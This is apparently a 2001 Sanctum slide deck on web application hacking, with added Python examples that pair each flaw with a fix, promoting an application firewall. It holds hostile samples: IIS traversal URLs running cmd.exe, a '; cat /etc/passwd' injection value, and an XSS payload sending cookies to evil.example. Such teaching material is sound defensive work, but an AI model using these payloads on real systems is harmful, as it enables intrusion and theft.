Securing Web Applications and Data Flow
The Problem and the Solution

Presented by: Steve Pettit, Systems Engineering, Sanctum Inc.
Overview

• The Web Application Layer Threats

• Why the Problem Exists
    – Landscape
    – Anatomy of a Web Application Server

• The Failed Solutions
    – Manual patching and code review are not fast enough
    – Traditional solutions fail (FW / IDS / ACLs / OS hardening…)

• Application Firewalling as a Solution
Recent News

"Code Red: Alive again and Kicking" (ZDNet, Aug 1, 2001)
97% of Sites Are Vulnerable

Breakdown of findings (pie chart in the original):
    31%  Full Control & Access to Information
    25%  Privacy Breach
    23%  e-Shoplifting
     7%  Modify Information
     7%  Hijack Transaction
     4%  Minor Breach
     3%  Delete Web Site

The results of over 300 AppAudits conducted with AppScan
The Business Problem - Web Application Hacking

Type A - Stealing Company Assets
    Hackers can access corporate assets, from strategic documents and
    personnel records to intellectual property, patents and business secrets.

Type B - Falsifying B2B or B2C Buy/Sell Transactions
    Hackers can alter the price of your goods and services, effectively
    buying products for next to nothing, or changing your content.

Type C - Obtaining Customer Information
    Hackers can access your customers' most sensitive information, from
    credit card numbers and financial data to medical records and private
    messages.

Type D - Defacing a Site
    Hackers can turn your applications against you to deface, debilitate or
    totally shut down your site.
Ten Categories of Application Hacks

•   Hidden Field Manipulation - eShoplifting
•   Parameter Tampering - access OS or sensitive data; fraud
•   Backdoors and Debug Options - access code/application as developer or admin
•   Cookie Poisoning - identity theft, illegal transactions
•   Stealth Commanding - access OS or control application at OS level, site defacement
•   Forceful Browsing - access sensitive data
•   Cross-Site Scripting - script execution in the victim's browser, access sensitive data; eHijacking
•   Buffer Overflow - access sensitive data, or crash site/application
•   3rd-Party Misconfiguration - access OS or data
•   Published/Known Vulnerabilities - access OS; crash site; access sensitive data
Hidden Field Manipulation

• Vulnerability explanation:
    The application sends data to the client in a hidden form field.
    Modifying the hidden field alters the data that returns to the web
    application.

• Why Hidden Field Manipulation:
    Passing hidden fields is a simple and efficient way to pass information
    from one part of the application to another (or between two applications)
    without the use of complex backend systems. The field is hidden from the
    rendered page, not from the user: anyone can view the source or edit the
    request before it is sent.

• As a result of this manipulation:
    The application acts according to the changed information and not
    according to the original data.
Hidden Field Manipulation - Example
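A worked example of the manipulation above and two server-side fixes, added here as illustration; it is not code from the slides or from Sanctum. The catalog, the two POST bodies and the signing key are constructed for the example, and `SECRET` stands in for a key that would live only on the server.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed catalog: the server's own price list, in cents.
CATALOG = {"sku-100": 4999}

# Hypothetical server-only key for signing hidden fields (assumption for this
# example); it is never sent to the browser.
SECRET = b"example-key-replace-me"

# Constructed POST bodies.  The form carried
#   <input type="hidden" name="price" value="4999">
# and the attacker edits the value to 1 before submitting.
HONEST_BODY = "sku=sku-100&qty=1&price=4999"
TAMPERED_BODY = "sku=sku-100&qty=1&price=1"


def checkout_vulnerable(body: str) -> int:
    """Charges whatever 'price' came back from the browser: eShoplifting."""
    form = parse_qs(body)
    return int(form["qty"][0]) * int(form["price"][0])


def checkout_catalog_lookup(body: str) -> int:
    """Fix 1: never round-trip the price; re-read it from the catalog."""
    form = parse_qs(body)
    sku, qty = form["sku"][0], int(form["qty"][0])
    if sku not in CATALOG or not 1 <= qty <= 100:
        raise ValueError("invalid sku or quantity")
    return qty * CATALOG[sku]


def sign_hidden(value: str) -> str:
    """Fix 2, for state that must round-trip: append an HMAC to the value."""
    mac = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"


def verify_hidden(field: str) -> str:
    """Recompute the HMAC over the returned value; reject any change."""
    value, _, mac = field.rpartition("|")
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):      # constant-time compare
        raise ValueError("hidden field was modified")
    return value


def checkout_signed(body: str) -> int:
    """Same flow as the vulnerable handler, but the price field carries a MAC."""
    form = parse_qs(body)
    price = int(verify_hidden(form["price"][0]))
    return int(form["qty"][0]) * price


def signed_field_accepted(body: str) -> bool:
    """True if checkout_signed accepts the body, False if it rejects it."""
    try:
        checkout_signed(body)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable handler charges (cents):", checkout_vulnerable(TAMPERED_BODY))
    print("catalog lookup charges (cents):", checkout_catalog_lookup(TAMPERED_BODY))
    signed_body = "sku=sku-100&qty=1&price=" + sign_hidden("4999")
    print("signed field accepted:", signed_field_accepted(signed_body))
    print("tampered field accepted:", signed_field_accepted(TAMPERED_BODY))
```

Re-reading the price from the catalog is the right fix for a price. The HMAC variant is for state that genuinely has to pass through the browser (a multi-step wizard, for instance), and it only stops modification, not replay: a signed price from an old promotion still verifies unless the signed value also carries an order id or expiry.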
Cookie Poisoning

• Vulnerability explanation:
    The session information contained within the cookie is changed to a
    different value, causing the application to switch to the new session ID.

• Why Cookie Poisoning:
    Some session IDs are not secure, e.g. not encrypted, weakly encrypted,
    merely hashed or encoded, or predictable. This is due to a lack of
    cryptographic expertise among developers.

• As a result of this manipulation:
    Hackers can assume the user's identity and access that user's
    information: identity theft/impersonation.
Cookie Poisoning - Example
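An added example (not from the slides) of two cookie designs that invite poisoning and one that does not. The session classes and their names are hypothetical; the cookie contents and IDs are constructed inline.

```python
import base64
import secrets

# --- Weak design 1: the cookie carries the session state itself, merely
#     base64-encoded.  Encoding is neither encryption nor authentication. ---

def make_weak_cookie(user: str, role: str) -> str:
    return base64.b64encode(f"user={user};role={role}".encode()).decode()


def read_weak_cookie(cookie: str) -> dict:
    raw = base64.b64decode(cookie).decode()
    return dict(pair.split("=", 1) for pair in raw.split(";"))


def poison_weak_cookie(cookie: str) -> str:
    """The attacker's step: decode, rewrite the role, re-encode. No key needed."""
    fields = read_weak_cookie(cookie)
    return make_weak_cookie(fields["user"], "admin")


# --- Weak design 2: state stays on the server, but session IDs are sequential ---

class SequentialSessions:
    def __init__(self) -> None:
        self.next_id = 1000
        self.store: dict = {}

    def create(self, user: str) -> str:
        sid = str(self.next_id)
        self.next_id += 1
        self.store[sid] = user
        return sid

    def lookup(self, sid: str):
        return self.store.get(sid)


def guess_neighbours(sid: str, span: int = 3) -> list:
    """The attacker's step: try the IDs issued just before and after mine."""
    n = int(sid)
    return [str(i) for i in range(n - span, n + span + 1) if i != n]


# --- Hardened: opaque, unguessable IDs; all state stays on the server ---

class RandomSessions:
    def __init__(self) -> None:
        self.store: dict = {}

    def create(self, user: str, role: str) -> str:
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self.store[sid] = {"user": user, "role": role}
        return sid

    def lookup(self, sid: str):
        # An altered or guessed ID simply maps to nothing.  There is no field
        # in the cookie whose edit could change the role.
        return self.store.get(sid)


def flip_last_char(sid: str) -> str:
    """Constructed tamper attempt: change one character of an opaque ID."""
    return sid[:-1] + ("A" if sid[-1] != "A" else "B")
```

Note what the hardened version does not do: it does not encrypt the role and send it back. The role never leaves the server, so there is nothing in the cookie to edit, and the ID is a random 256-bit lookup key, so there is nothing to guess. An opaque server-side session fixes both weak designs at once, which is why it is the standard answer rather than a stronger cipher over client-held state (mark the cookie Secure and HttpOnly as well so it is not exposed in transit or to script).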
Backdoor & Debug Options

• Vulnerability explanation:
    The application has hidden debug options that can be activated by
    sending a specific parameter or sequence.

• Why Backdoor and Debug Options:
    1. Leaving debug options in the code lets developers find and fix bugs
       faster.
    2. Developers leave backdoors as a way of guaranteeing their own access
       to the system.

• As a result of this manipulation:
    Activating the hidden debug option gives the hacker extensive access to
    the application (usually unlimited).
Backdoor & Debug options - Example
Application Buffer Overflow

• Vulnerability explanation:
    Exploiting a flaw in a form to overload the server with excess input:
    sending more characters than the receiving buffer holds makes it
    misbehave.

• Why Application Buffer Overflow:
    The application does not check the number of characters before copying
    them.

• As a result of this manipulation:
    The application crashes and in many cases brings the whole site down
    (DoS). In other cases the application executes the code received as
    input.
Application Buffer Overflow- Example
Stealth Commanding

• Vulnerability explanation:
    Concealing operating-system commands inside ordinary input (a Trojan
    horse in a form field) with the intent to run malicious or unauthorized
    code that damages the site.

• Why Stealth Commanding:
    Applications tend to use the content received from a field to build a new
    command. However, they assume that the content is only data and not
    executable code, so shell metacharacters in the field are passed straight
    through.

• As a result of this manipulation:
    The hacker can perform any command on the web server, including a
    complete shutdown, defacement, or access to all information.
Stealth Commanding - Example
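An added example of the field-becomes-command problem described above, not taken from the slides: a hypothetical diagnostics page that pings a host the user names. The two inputs are constructed; `build_ping_vulnerable` shows the string such a handler would hand to `os.system()`, and `build_ping_safe` shows the validated argv that goes to `subprocess` without a shell.

```python
import re
import subprocess

# Allowlist for what the 'host' field may contain: DNS labels only.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)

# Constructed inputs: what an honest user and an attacker type into the
# "host to ping" field of the hypothetical diagnostics page.
HONEST_HOST = "www.example.com"
ATTACK_HOST = "www.example.com; cat /etc/passwd"


def build_ping_vulnerable(host: str) -> str:
    """The string a handler might pass to os.system().  The field is treated
    as data, but the shell treats ';' as a command separator."""
    return "ping -c 1 " + host


def commands_the_shell_would_run(cmdline: str) -> list:
    """Rough split on shell control operators, to show how many separate
    commands the shell would execute for a given command line."""
    parts = re.split(r"\s*(?:;|&&|\|\||\||&|\n)\s*", cmdline)
    return [p for p in parts if p]


def build_ping_safe(host: str) -> list:
    """Validate against the allowlist, then build an argv list.  With a list
    and shell=False there is no shell to interpret metacharacters at all."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host field: {host!r}")
    return ["ping", "-c", "1", host]


def host_field_accepted(host: str) -> bool:
    try:
        build_ping_safe(host)
        return True
    except ValueError:
        return False


def run_ping(host: str) -> int:
    """Execute the validated argv without a shell; returns the exit status."""
    return subprocess.run(build_ping_safe(host), capture_output=True,
                          timeout=10).returncode


if __name__ == "__main__":
    bad = build_ping_vulnerable(ATTACK_HOST)
    print("shell would run:", commands_the_shell_would_run(bad))
    print("safe argv:", build_ping_safe(HONEST_HOST))
    print("attack string accepted:", host_field_accepted(ATTACK_HOST))
```

The allowlist does the real work: quoting (`shlex.quote`) would also neutralise the `;`, but it leaves a shell in the loop, and a value such as `-f` that passes quoting can still be read as an option by the program. Rejecting anything that is not a hostname removes both problems.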
Known Vulnerabilities

• Vulnerability explanation:
    Some technologies used in sites have inherent weaknesses that a
    persistent hacker, or one with automated scanning tools, can exploit
    easily. Users depend on patches from the vendor. Once a weakness is
    discovered in one site it can be used against every site running the
    same component.

• Why Known Vulnerabilities:
    Third party vendors have bugs (Microsoft IIS etc). Since their products
    appear in many sites they are examined thoroughly by a large number of
    hackers.

• As a result of this manipulation:
    Once a bug is found, large parts of the Internet are scanned and
    exploited. The actual result varies with the vulnerability type, but the
    ability to obtain the administrator's passwords and take control of the
    site is not unusual.
Known Vulnerabilities - Example

    /msadc/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:

    (IIS Unicode directory traversal: %c0%af is an overlong UTF-8 encoding of
    "/" that the server decoded only after its path check, so the request
    walks out of the web root and runs cmd.exe.)
3rd Party Misconfigurations

• Vulnerability explanation:
    A misconfiguration, or human error during installation of 3rd party
    software, leaves default passwords, sample files or settings unchanged:
    an open invitation for attack.

• Why 3rd party misconfigurations:
    They occur during the installation and maintenance of the 3rd party
    application.

• As a result of this manipulation:
    Through a configuration error a hacker could, for example, create a new
    database that renders the existing one unusable by the site.
3rd Party Misconfiguration - Example

    /msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../..

    (showcode.asp is a sample script shipped with the IIS MDAC samples; left
    installed, it reads back any file reachable by a relative path.)
Cross Site Scripting

• Vulnerability explanation:
    A third party creates a link (or sends an email) whose URL contains a
    parameter holding a script; when the user follows it, the site echoes the
    parameter into its page and the user's browser runs the script in the
    site's context.

• Why Cross Site Scripting:
    Many parameters are embedded in the HTML of subsequent responses without
    their content being checked or encoded for scripts.

• As a result of this manipulation:
    "Virtual hijacking" of the session. Any information flowing between the
    legitimate user and the site can be manipulated or transmitted to the
    evil 3rd party.
Cross Site Scripting - Example

    Press this link to get to your bank
    Underlying link: http://www.mybank.com?a=<evil javascript>

    The JavaScript program collects and sends user names and passwords.

    (Figure: three numbered steps around the bank's login form, "Enter your
    login information", with its Username and Password fields.)
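The reflection step from the example above, written out as an added example (not the slides' code): the page puts the `a` parameter straight into its HTML, so the browser runs whatever the link carried. The template, the payload and the hostname `evil.example` are constructed for the example; `html.escape` is the fix.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed page template: the 'a' parameter is reflected into the HTML.
TEMPLATE = (
    "<html><body><h1>MyBank</h1>"
    "<p>Welcome back, {name}. Enter your login information.</p>"
    "<form method=post><input name=user><input name=pass type=password></form>"
    "</body></html>"
)

# Constructed attacker payload: ships the victim's cookie to a third-party host
# (hypothetical evil.example).  A real one would also hook the login form.
PAYLOAD = ("<script>new Image().src='http://evil.example/steal?c='"
           ".concat(document.cookie)</script>")
DEMO_URL = "http://www.mybank.com/?a=" + quote(PAYLOAD, safe="")
HONEST_URL = "http://www.mybank.com/?a=Alice"


def reflected_param(url: str) -> str:
    """The value of ?a= as the server sees it after URL decoding."""
    return parse_qs(urlsplit(url).query).get("a", [""])[0]


def render_vulnerable(url: str) -> str:
    """Inserts the parameter verbatim: the browser runs whatever it contains."""
    return TEMPLATE.format(name=reflected_param(url))


def render_safe(url: str) -> str:
    """Escapes <, >, &, and quotes: the payload becomes inert text."""
    return TEMPLATE.format(name=html.escape(reflected_param(url), quote=True))


def contains_active_content(page: str) -> bool:
    """Coarse check used only to show the difference between the two
    renderings; it is not a substitute for output encoding."""
    low = page.lower()
    return "<script" in low or "javascript:" in low or " onerror=" in low


if __name__ == "__main__":
    print(render_vulnerable(DEMO_URL))
    print(render_safe(DEMO_URL))
```

Encode at output time, for the context the value lands in (HTML body here; attributes, URLs and script blocks each need their own encoding). Marking the session cookie HttpOnly limits what a successful injection can steal, but it does not stop the script from submitting the login form on the user's behalf.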
Parameter Tampering

• Vulnerability explanation:
    Parameters are used to obtain information from the client. This
    information can be changed in the site's URL parameters.

• Why Parameter Tampering:
    Developers focus on the legal values of parameters and how they should
    be used. Little if any attention is given to incorrect values.

• As a result of this manipulation:
    The application can perform a function that was not intended by its
    developer, such as giving access to another customer's information.
Parameter Tampering - Example
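The next example, added here and not from the slides, serves both this section and the earlier Backdoor & Debug Options one: the same positive validation that stops a tampered account number also refuses a leftover `debug=1` switch, because anything outside the page's declared parameter set is rejected. The account table, the schema and the handler names are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed account table: what the backend returns for a statement.
ACCOUNTS = {
    "1001": {"owner": "alice", "balance_cents": 25_000},
    "1002": {"owner": "bob",   "balance_cents": 940_000},
}

# Positive model: every parameter this page accepts, its syntax, its range.
# Anything not listed (including a forgotten debug switch) is rejected.
SCHEMA = {
    "account": {"pattern": r"\d{4}"},
    "page":    {"pattern": r"\d{1,3}", "min": 1, "max": 500},
}


def validate_params(query: str, schema: dict = SCHEMA) -> dict:
    """Return only parameters that match the schema; raise on anything else."""
    form = parse_qs(query, keep_blank_values=True)
    clean = {}
    for name, values in form.items():
        rule = schema.get(name)
        if rule is None:
            raise ValueError(f"unexpected parameter {name!r}")
        if len(values) != 1:
            raise ValueError(f"parameter {name!r} supplied {len(values)} times")
        value = values[0]
        if not re.fullmatch(rule["pattern"], value):
            raise ValueError(f"parameter {name!r} has illegal value {value!r}")
        if "min" in rule and not rule["min"] <= int(value) <= rule["max"]:
            raise ValueError(f"parameter {name!r} out of range")
        clean[name] = value
    return clean


def statement_vulnerable(session_user: str, query: str) -> dict:
    """Uses the account number from the URL as-is: alice asks for 1002 and
    gets bob's statement.  Parameter tampering in its simplest form."""
    account = parse_qs(query)["account"][0]
    return ACCOUNTS[account]


def statement_safe(session_user: str, query: str) -> dict:
    """Validate the syntax, then check that the caller owns the object."""
    params = validate_params(query)
    acct = ACCOUNTS.get(params["account"])
    if acct is None or acct["owner"] != session_user:
        # Same answer for 'missing' and 'not yours', so the parameter cannot
        # be used to enumerate which accounts exist.
        raise PermissionError("no such account for this user")
    return acct


def request_outcome(session_user: str, query: str) -> str:
    """Reports what the hardened handler decided, for a quick comparison."""
    try:
        statement_safe(session_user, query)
        return "ok"
    except ValueError as exc:
        return f"rejected: {exc}"
    except PermissionError:
        return "forbidden"


if __name__ == "__main__":
    print("vulnerable:", statement_vulnerable("alice", "account=1002"))
    for q in ("account=1001", "account=1002", "account=1001&debug=1",
              "account=1001'%20OR%201=1"):
        print(q, "->", request_outcome("alice", q))
```

The ownership check is the part that is usually missing: syntax validation alone would accept `account=1002` from alice, since it is a perfectly legal value. Both halves are needed, and the identity used in the check must come from the server-side session, never from another parameter.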
Forceful Browsing

• Vulnerability explanation:
    By "guessing" the names of files and directories the hacker can view
    them without going through the business logic that leads to those
    objects.

• Why forceful browsing:
    1. Default files are left behind by the installation process.
    2. New files that should not be exposed, and old files that should have
       been removed, are left (outside the normal flow) by mistake.

• As a result of this manipulation:
    Content (log files, administration facilities, application source code)
    is revealed through direct file and directory access.
Forceful Browsing - Example
The Four Levels of Web Security

    Level      1              2               3                 4
               Desktop        Transport       Network           Web Applications
    Security   Antivirus      Encryption      Firewall          Manual Patching
    Threat     Disruption     Interception    Illegal Access    Perversion
Desktop Level (1)

•   AntiVirus Software
    – Symantec
    – Network Associates
    – Trend Micro
•   Personal Firewalls
    – Symantec
    – Network Ice
    – ZoneAlarm

    Security: Antivirus      Threat: Disruption
Transport Level (2)

•   Encryption
    – Virtual Private Network (VPN)
        • Entrust, Cisco, CheckPoint
    – Secure Socket Layer (SSL)
        • Netscape
•   Authentication
    – PKI
        • Entrust, Verisign

    Security: Encryption     Threat: Interception
Network Level (3)

•   Firewalls
    – CheckPoint, Cisco, WatchGuard
•   Intrusion Detection
    – ISS, Cisco, CA
•   Vulnerability Scanners
    – NAI, ISS

    Security: Firewall       Threat: Illegal Access
Web Application Level (4)

    The Inner Sanctum:
•   Content
    – Static, Dynamic (application services)
•   Data
    – Customer, Corporate, …
•   In-house developed code
•   3rd party components
    – Web server, App server, DB server, OS, …

    75% of the hacks occur at the application level (Gartner Group)

    Security: Manual Patching    Threat: Web Perversion
  Why the Problem Exists and How to Fix It

• Why
   –   Anatomy of a Web Application
   –   Web Application Message Flow
   –   Organization Issues with Managing a Web Application
   –   Technical Threats for Web Application Components


• How to Fix it
   – Need for Application Firewall
   – Criteria of an Application Firewall
   – Application Firewall as a Solution
  Anatomy of a Web application

• Web Server - Server Software (iPlanet, Apache, IIS)

• User Interface Code - Site look and Feel (HTML, JavaScript, ActiveX)

• Front End System - Scripting Languages (ColdFusion, CGIs)

• Back End System – Business Driver (MainFrame, Peoplesoft, SAP, ERP)

• Database - Oracle, DB2

• Data - Target of the site
Web Application Message Flow

    Layers, from the user inward (input and output pass through each):
        Browser
        User Input (HTML/HTTP)
        Web Server
        User Interface Code
        Frontend Application
        Backend Application
        Database
        Data

•   The business logic that enables:
    –   User's interaction with the Web site
    –   Transacting/interfacing with back-end data systems (databases, CRM,
        ERP etc)
•   In the form of:
    –   3rd party packaged software; i.e. web server, shopping cart software,
        personalization engines etc.
    –   Code developed in-house / web builder / system integrator

    Input and Output flow through each layer of the application.
    A break in any layer breaks the whole application.
Web Application Organizational Issues

•   Many groups are involved in creating and supporting a Web application
    at its different layers, with much overlap:
             –   Marketing
             –   Application Managers
             –   Application Developers
             –   Database Administrators
             –   Database Developers
             –   Operations Support
             –   Network Administrators
             –   System Administrators
             –   Vendor

•   Who is the real owner?

•   Who is responsible for support?

•   Who is responsible for maintaining the code?

•   Who owns the data?
Web Application Organizational Issues

    (Matrix: the roles Marketing, Application Manager, Application
    Developer, Database Admin, Database Developer, Operations Support,
    Network Admin, System Admin, Vendor and Customer against the layers
    User Interface, Web Server, Frontend Application, Backend Application,
    Database and Data; the cell marks are not reproduced here.)

    Developing and Supporting a Web Application requires
    close interdepartmental communication.
Threats at the Application Layers

• Each layer of the application has its own unique vulnerabilities

• A vulnerability fixed at one layer may still be exploitable at
   another layer

• An exploit at any layer of the application affects the integrity of
   the entire application
    – Application DoS
    – Compromised Security
Application Layer Threats

    (Matrix: the ten hack categories Hidden Manipulation, Cookie Poisoning,
    Backdoor & Debug Options, Buffer Overflow, Stealth Commanding, 3rd Party
    Misconfiguration, Known Vulnerabilities, Parameter Tampering, Cross Site
    Scripting and Forceful Browsing against the layers User Interface, Web
    Server, Frontend Application, Backend Application and Database; the
    cell marks are not reproduced here.)
Web Application Message Flow
Valid and Invalid Input

    (Diagram: valid and invalid HTML/HTTP input both travel from the Browser
    through the Web Server, User Interface Code, Frontend Application,
    Backend Application and Database to the Data.)

    Invalid data can exploit weaknesses in the application, which act as
    escape holes, resulting in access to unauthorized accounts, the O/S, the
    network and sensitive data, and may even result in an application denial
    of service.

    Without any protection, holes and backdoors exist at every layer
    waiting to be exploited.
Targeting Flaws in Web Applications
How Safe is the Application after Removing Known Bugs?

    (Diagram: requests from the Browser pass the common security approaches
    and reach the Web Server and Application.)

    Legend:
        Invalid HTTP/HTML Web Request  ->  Application Impurity
                                           (based on the 10 types of hacks)
                                           Internal / External Illegal Target
        Valid HTTP/HTML Web Request    ->  Legal Application Data Target
Most Browser Attacks Flow Through Standard Security,
Only a Few are Blocked

    (Diagram: Firewall, Intrusion Detection, Authentication, Encryption,
    Access Control and Hardened OS stacked in front of the Web Server;
    legend: Application Exploit, Unblocked HTTP/HTML Attack, Blocked
    HTTP/HTML Attack.)
  Why Common Security Tools Fail at
  Stopping Application Level Attacks

• They are good at addressing issues around the application
   – Application Access
   – Login and Authentication
   – Encryption


• But simply are NOT designed to address application layer
  attacks
   – Do not Operate at the Application Layer
      • Application Messaging (Parameter passing)
   – Do not Understand Content Logic of the Application
      • Is it a good or bad request?
    Common Solution Approaches

    Categories

•   Hardened Servers
•   Host Based Intrusion Detection
•   Access Control
•   Content Integrity
•   Total Application Shielding
Solution Approaches

    (Diagram: basic site architecture.)
    Hardened Servers
    OS and service level hardening of the Web servers
•   Argus – PitBull
•   HP – Virtual Vault
    Does not operate at the Application Layer

    Host Based Intrusion Detection
    Attack pattern identification, and OS-level enforcement
•   entercept
    Does not understand the Application Logic

    Access Control
    Rule-based authentication and authorization
•   Netegrity – SiteMinder
•   IBM – Tivoli Policy Director
•   Internet Dynamics – Conclave
•   Ubizen – MultiSecure Suite
    Does not understand the Application Logic

    Content Integrity
•   Gilian – G-Server
•   WatchGuard – ServerLock (Qiave)
    Does not address Application Logic Threats

    Total Application Shielding
•   Sanctum – AppShield
    Preventing misuse of the application and all its underlying components
How to Shield an Application?

• Install an Application Firewall
    – A tool that stops Web level attacks from reaching the Web server,
      thereby protecting the Web server, its application layers and all the
      resources it uses.

Requirements for an Application Firewall

•   Functions at the application level - ISO model layer 7
     –   Understands inbound and outbound requests
     –   Blocks invalid requests without terminating the entire user session

•   Designed to recognize & protect against application threats
     –   Signature & non-signature attacks

•   Dynamic and Accurate
     –   Understands application logic (Web perversion)

•   Architected with the Application
     –   Compatible with Web Application technologies

•   Works in Real Time
     –   Addresses threats before they reach the server

•   Provides Application Level Forensics
     –   Logging & Alerting

•   Single Point of Administration
     –   One solution to protect all application components
Some Variations on a Specific Application Layer Attack

• URL Forceful Browsing attempts on "samples/admin"
       •   Direct Request         samples/admin
       •   Delimiter Padding      samples///admin
       •   Absolute Pathing       samples/./admin
       •   URL Encoding           %2fsamples/admin
       •   Relative Pathing       samples/fakedir/../admin
       •   DOS Syntax             samples\admin
       •   Null Method            GET%00/samples/admin
       •   others …

     Security tools need to operate at Layer 7 to see the attacks
     and need to understand the application logic to block the attacks.
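The following example, added here and not part of the slides, implements the Layer 7 normalisation the slide calls for: every listed variant is reduced to one canonical path before the allow/deny decision, and each trick seen on the way is recorded. The same decoder handles the overlong-UTF-8 traversal from the Known Vulnerabilities example (`%c0%af`) and the guessed paths of the Forceful Browsing section, so this one block serves those passages too. `DENIED_PREFIXES`, the anomaly names and `SLIDE_VARIANTS` are constructed for the example; a real application firewall would work from the set of links and forms the application actually emits rather than from a deny list.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Hypothetical deny list standing in for the application's real map of what a
# browser may request; "samples/admin" is the target from the slide above.
DENIED_PREFIXES = ("/samples/admin",)

# Anomalies that warrant a block on their own, whatever the path resolves to.
HARD_BLOCK = {"null-byte", "overlong-utf8", "excessive-encoding"}

# The variants from the slide (constructed list; the null-byte one is separate).
SLIDE_VARIANTS = ["samples/admin", "samples///admin", "samples/./admin",
                  "%2fsamples/admin", "samples/fakedir/../admin", "samples\\admin"]
NULL_VARIANT = "GET%00/samples/admin"


def lenient_utf8(data: bytes) -> str:
    """Decode UTF-8 the forgiving way the vulnerable IIS decoder did: the
    two-byte form is accepted without continuation or overlong checks, so
    C0 AF -> '/' and C1 1C -> '\\'.  Python's strict decoder rejects both."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xE0 <= b < 0xF0 and i + 2 < n and all(data[i + k] & 0xC0 == 0x80 for k in (1, 2)):
            cp = ((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)
            out.append("\ufffd" if 0xD800 <= cp <= 0xDFFF else chr(cp))
            i += 3
        elif 0xF0 <= b < 0xF5 and i + 3 < n and all(data[i + k] & 0xC0 == 0x80 for k in (1, 2, 3)):
            cp = (((b & 0x07) << 18) | ((data[i + 1] & 0x3F) << 12)
                  | ((data[i + 2] & 0x3F) << 6) | (data[i + 3] & 0x3F))
            out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
            i += 4
        elif 0xC0 <= b < 0xE0 and i + 1 < n:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))   # the IIS bug
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def canonical_path(target: str, max_rounds: int = 3):
    """Reduce a request target to one canonical path and record every trick
    seen on the way.  Returns (path, set_of_anomalies)."""
    anomalies = set()
    path = target.split("?", 1)[0]
    for _ in range(max_rounds):                    # repeat so double encoding unwinds
        raw = unquote_to_bytes(path)
        if any(b in (0xC0, 0xC1) for b in raw):    # never valid UTF-8 lead bytes
            anomalies.add("overlong-utf8")
        decoded = lenient_utf8(raw)
        if decoded == path:
            break
        anomalies.add("percent-encoding")
        path = decoded
    else:
        anomalies.add("excessive-encoding")
    if "\x00" in path: # C string handlers downstream would stop reading here
        anomalies.add("null-byte")
        path = path.replace("\x00", "")
    if "\\" in path:
        anomalies.add("backslash")
        path = path.replace("\\", "/")
    if "//" in path:
        anomalies.add("duplicate-slash")
        path = re.sub(r"/+", "/", path)
    if not path.startswith("/"):
        path = "/" + path
    if any(seg in (".", "..") for seg in path.split("/")):
        anomalies.add("dot-segment")
    return posixpath.normpath(path), anomalies


def should_block(target: str) -> bool:
    path, anomalies = canonical_path(target)
    if anomalies & HARD_BLOCK:
        return True
    return any(path == p or path.startswith(p + "/") for p in DENIED_PREFIXES)


if __name__ == "__main__":
    for v in SLIDE_VARIANTS + [NULL_VARIANT]:
        print(f"{v:28} -> {canonical_path(v)}  block={should_block(v)}")
```

Two details matter in practice: decoding is repeated until the path stops changing (so `%252f` is caught), and the comparison is done on the canonical form rather than on the raw bytes, which is why a signature written for one spelling of `samples/admin` is not enough. Both checks must also run before the request reaches any component that decodes on its own; that ordering is exactly what the IIS bug got wrong.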
Comparison based on Application Needs & Application Firewall Criteria

    (Matrix: the ten attack types App. Buffer Overflow, Cookie Poisoning,
    Cross Site Scripting, Hidden Manipulation, Stealth Commanding, 3rd Party
    Misconfig., Known Vulnerabilities, Parameter Tampering, Backdoors &
    Debug Opt. and Forceful Browsing against Authentication, Intrusion
    Detection, Access Control, Firewall, Encryption, Hardened OS and
    Application Firewalling, each cell marked Protected, Partial Protection
    or left blank; the marks are not reproduced here.)
Application Firewall Blocks Browser Attacks Missed by Other Tools

    (Diagram: Firewall, Intrusion Detection, Authentication, Encryption,
    Access Control and Hardened OS in front of the Web Server, with the
    Application Firewall as the last element before it; legend: Application
    Exploit, Unblocked HTTP/HTML Attack, Blocked HTTP/HTML Attack.)

Application Firewall Prevents Impurities from Being Exploited

    (Diagram: requests from the Browser pass the common security approaches
    and then the Application FW before reaching the Web Server and
    Application; two requests are marked X, stopped at the Application FW.)

    Legend:
        Invalid HTTP/HTML Web Request  ->  Application Impurity
                                           (based on the 10 types of hacks)
                                           Internal / External Illegal Target
        Valid HTTP/HTML Web Request    ->  Legal Application Data Target

Block Threats on Input Stream Protects Web Applications from Exploitation

    (Diagram: the layer stack Browser, Web Server, User Interface Code,
    Frontend Application, Backend Application, Database, Data; valid and
    invalid HTML/HTTP input arrive at the bottom and the invalid input is
    stopped at the entry point.)

    Block Invalid Input at the Entry Point. This protects the Web
    Application. Sensitive Data and Resources remain safe even if exploits
    exist in the application.

    If threats can't reach the holes and backdoors at each layer
    then they can't be exploited.
Post Script
Web Worms & Application Firewalling

•   Web Worms are autonomous code that propagate by seeking out Web servers
    and infecting them

•   Web Worms rely on specific exploits to enter a site
     – the Ten Types of Web Hacks

•   Companies have spent billions recovering from Web Worm damage

•   Some well known Web Worms
     –   sadmind/IIS – Solaris and IIS - (5/01)
     –   Code Red – IIS - (7/01)
     –   Code Red II – IIS - (8/01)
     –   Nimda – IIS - (9/01)
     –   Nimda A-E – (10/01)
     –   More are coming …

Code Red Stopped in its tracks from Infecting Web Server
Nimda Stopped in its tracks from Infecting Web Server

Stop the Worms before they Stop You

• Web Worms automate the attacks that hackers use

